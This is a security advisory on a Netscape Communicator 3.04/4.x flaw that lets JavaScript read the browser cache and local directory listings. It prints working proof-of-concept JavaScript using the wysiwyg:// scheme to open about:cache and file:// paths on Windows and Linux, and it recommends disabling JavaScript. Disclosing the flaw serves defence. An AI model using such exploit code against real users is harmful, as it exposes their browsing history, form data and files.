COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape Communicator 3.04, 4.5, 4.07 under Win, Linux, etc

PROBLEM

    Georgi  Guninski  found  the following.  There  is  a bug in Netscape
    Communicator 4.5,  4.07, 3.04  under Windows  95 (probably others)
    which allows reading the user's cache (the URLs the user has visited,
    including  the  info  in  GET  forms).  Reading  local directory
    contents is  also allowed.  This info  may be  sent to an arbitrary
    host.  The bug may be exploited by email.  Demonstrations are
    available at:

      Cache reading:
        http://www.geocities.com/ResearchTriangle/1711/b4.html

      Directory reading:
        http://www.geocities.com/ResearchTriangle/1711/b5.html

    The javascript code is:

        sl=window.open('wysiwyg://1/about:cache');
        //For Netscape 3.04 remove 'wysiwyg://1/'
        sl2=sl.window.open();
        sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
        sl2.location.reload();

    It is confirmed  this also works  under Linux, and  probably other
    Unixes as demonstrated by the slightly modified copy available at:

        http://www-miaif.lip6.fr/willy/security/netscape.html

    Ryan Gray added that Netscape Communicator 4.5b2 on Slackware  3.5
    (kernel 2.0.34)  is susceptible  to this  also.   As for the local
    reading, with a little modification it will do that too.  For example,
    the line in Georgi's script that reads local files is:

        sl=window.open('wysiwyg://1/file:///c|/');

    With just a little change, taking the Linux directory structure into
    consideration and adding proper backslash escapes:

        sl=window.open('wysiwyg://1/file://\/');

    That'll give you a listing of '/' on the local box.

SOLUTION

    Disable Javascript.